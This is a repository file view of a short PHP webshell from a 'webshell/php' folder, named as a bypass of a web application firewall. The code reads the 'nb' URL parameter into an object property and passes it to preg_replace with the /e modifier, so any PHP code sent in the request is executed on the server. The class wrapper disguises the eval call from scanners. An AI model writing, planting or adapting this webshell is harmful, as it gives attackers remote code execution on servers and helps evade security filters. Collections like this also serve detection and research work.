webshell/php/bypass-dog-2020-01-30.php

13 lines
180 B
PHP
Raw Normal View History

<?php
class SBdog{
public $x;
function dog(){
$this->x=$_GET['nb'];
}
}
$class=new SBdog();
$class->dog();
$a=$class->x;
preg_replace("/dog/e", $a, "I am a sb dog");
?>